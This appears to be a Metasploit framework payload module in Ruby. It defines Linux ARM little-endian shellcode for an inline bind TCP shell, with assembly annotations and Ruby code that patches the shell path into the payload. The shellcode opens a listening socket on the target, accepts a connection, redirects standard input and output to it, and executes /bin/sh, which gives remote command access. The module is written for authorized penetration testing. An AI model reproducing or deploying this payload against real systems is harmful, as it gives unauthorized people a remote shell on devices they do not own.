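##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Linux ARM (little-endian) inline bind TCP command shell.
#
# The shellcode below does socket -> bind -> listen -> accept, dup2()s the
# accepted client socket over fds 2, 1 and 0, then execve()s the shell whose
# path is patched into a 16-byte NUL-filled buffer at the end of the blob by
# #generate.  sin_port and sin_addr of the sockaddr_in are patched by the
# framework through the 'Offsets' table.
module MetasploitModule
  CachedSize = 208

  include Msf::Payload::Single
  include Msf::Payload::Linux::Armle::Prepends
  include Msf::Sessions::CommandShellOptions

  # Byte offset of the 16-byte shell path buffer (<shell> below).
  SHELL_OFFSET = 176
  # Byte offset of the 16-byte argv[0] buffer (<arg> below).
  ARGV0_OFFSET = 192
  # Size of each string buffer; at least one byte must stay NUL so the C
  # string execve() reads is terminated.
  STRING_BUF_SIZE = 16

  def initialize(info = {})
    super(
      merge_info(
        info,
        # The handler is BindTcp and the shellcode bind()s/listen()s/accept()s,
        # so this is a bind shell; the metadata used to say "Reverse TCP",
        # which mislabels the payload in module listings.
        'Name' => 'Linux Command Shell, Bind TCP Inline',
        'Version' => '',
        'Description' => 'Listen for a connection and spawn a command shell',
        'Author' => ['civ', 'hal'],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_ARMLE,
        'Handler' => Msf::Handler::BindTcp,
        'Session' => Msf::Sessions::CommandShellUnix,
        'Payload' => {
          'Offsets' =>
            {
              # sin_addr of the sockaddr_in the shellcode bind()s to, i.e. the
              # address the *target* listens on.
              # NOTE(review): confirm how the framework substitutes an unset
              # RHOST here; the literal placeholder is 192.168.1.1.
              'RHOST' => [ 172, 'ADDR' ],
              # sin_port, network byte order.
              'LPORT' => [ 170, 'n' ]
            },
          'Payload' =>
            [
              # socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6)
              # The syscall number 281 (0x119) does not fit an 8-bit rotated
              # ARM immediate, so r7 is built as (1 << 8) + 25.
              0xe3a00002, # mov r0, #2
              0xe3a01001, # mov r1, #1
              0xe3a02006, # mov r2, #6
              0xe3a07001, # mov r7, #1
              0xe1a07407, # lsl r7, r7, #8
              0xe2877019, # add r7, r7, #25
              0xef000000, # svc 0x00000000
              0xe1a06000, # mov r6, r0        ; r6 = listening socket

              # bind(r6, &<af>, 16) -- syscall 282
              0xe28f1080, # add r1, pc, #128  ; r1 = &<af> (pc+8+128 = byte 168)
              0xe3a02010, # mov r2, #16
              0xe3a07001, # mov r7, #1
              0xe1a07407, # lsl r7, r7, #8
              0xe287701a, # add r7, r7, #26
              0xef000000, # svc 0x00000000

              # listen(r6, r1) -- syscall 284; r1 still holds the sockaddr
              # pointer, which is simply used as a large backlog value
              0xe1a00006, # mov r0, r6
              0xe3a07001, # mov r7, #1
              0xe1a07407, # lsl r7, r7, #8
              0xe287701c, # add r7, r7, #28
              0xef000000, # svc 0x00000000

              # accept(r6, NULL, NULL) -- syscall 285
              0xe1a00006, # mov r0, r6
              0xe0411001, # sub r1, r1, r1    ; r1 = 0
              0xe0422002, # sub r2, r2, r2    ; r2 = 0
              0xe3a07001, # mov r7, #1
              0xe1a07407, # lsl r7, r7, #8
              0xe287701d, # add r7, r7, #29
              0xef000000, # svc 0x00000000

              # dup2(client, fd) for fd = 2, 1, 0 -- syscall 63
              0xe1a06000, # mov r6, r0        ; r6 = accepted client socket
              0xe3a01002, # mov r1, #2
              0xe1a00006, # mov r0, r6        ; loop top
              0xe3a0703f, # mov r7, #63       ; 0x3f
              0xef000000, # svc 0x00000000
              0xe2511001, # subs r1, r1, #1
              0x5afffffa, # bpl loop top (while r1 >= 0)

              # execve(<shell>, [<arg>, NULL], [NULL]) -- syscall 11
              # <shell> defaults to /bin/sh via the SHELL option.
              0xe28f0024, # add r0, pc, #36   ; r0 = &<shell> (byte 176)
              0xe0244004, # eor r4, r4, r4    ; r4 = 0
              0xe92d0010, # push {r4}         ; NULL terminator
              0xe1a0200d, # mov r2, sp        ; envp = [NULL]
              0xe28f4024, # add r4, pc, #36   ; r4 = &<arg> (byte 192)
              0xe92d0010, # push {r4}         ; argv = [&<arg>, NULL]
              0xe1a0100d, # mov r1, sp
              0xe3a0700b, # mov r7, #11       ; 0xb
              0xef000000, # svc 0x00000000

              # <af>: struct sockaddr_in { sin_family, sin_port, sin_addr }
              # Both port and address are placeholders: bytes 170-171 are
              # overwritten via the LPORT offset and bytes 172-175 via the
              # RHOST offset.  Note the literal below encodes port 0x2904
              # (10500), not 4444 as an earlier comment claimed; it never
              # reaches the target unpatched.
              0x04290002, # .hword 2 (AF_INET) ; .hword sin_port placeholder
              0x0101a8c0, # .word 0x0101a8c0   ; sin_addr placeholder 192.168.1.1

              # <shell>: 16 NUL bytes, patched with datastore['SHELL']
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000

              # <arg>: 16 NUL bytes, patched with datastore['ARGV0']
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
              0x00000000  # .word 0x00000000
            ].pack('V*')
        }
      )
    )

    # Register command execution options
    register_options(
      [
        OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ]),
        OptString.new('ARGV0', [ false, 'argv[0] to pass to execve', 'sh' ]) # mostly used for busybox
      ]
    )
  end

  # Build the payload with the configured shell path and argv[0] patched into
  # their 16-byte buffers.
  #
  # @param _opts [Hash] unused; kept for interface compatibility
  # @return [String] the 208-byte payload blob
  # @raise [ArgumentError] if SHELL or ARGV0 is 16 bytes or longer (there must
  #   be room for the NUL terminator) or contains an embedded NUL, which would
  #   silently truncate the string execve() sees
  def generate(_opts = {})
    payload = super

    patch_cstring(payload, SHELL_OFFSET, datastore['SHELL'], 'shell')

    # ARGV0 is optional; when unset the buffer stays all-NUL (argv[0] = "").
    argv0 = datastore['ARGV0']
    patch_cstring(payload, ARGV0_OFFSET, argv0, 'argv[0]') if argv0

    payload
  end

  private

  # Copy +value+ into the NUL-filled buffer at +offset+ of +buf+, relying on
  # the untouched tail bytes as the terminator.  Length checks use bytesize
  # rather than String#length so multi-byte characters cannot spill past the
  # buffer into the next one (the previous length-based check allowed that).
  def patch_cstring(buf, offset, value, what)
    value = value.to_s
    if value.bytesize >= STRING_BUF_SIZE
      raise ArgumentError, "The specified #{what} must be less than #{STRING_BUF_SIZE} bytes."
    end
    if value.include?("\x00")
      raise ArgumentError, "The specified #{what} must not contain NUL bytes."
    end

    buf[offset, value.bytesize] = value.b
  end
end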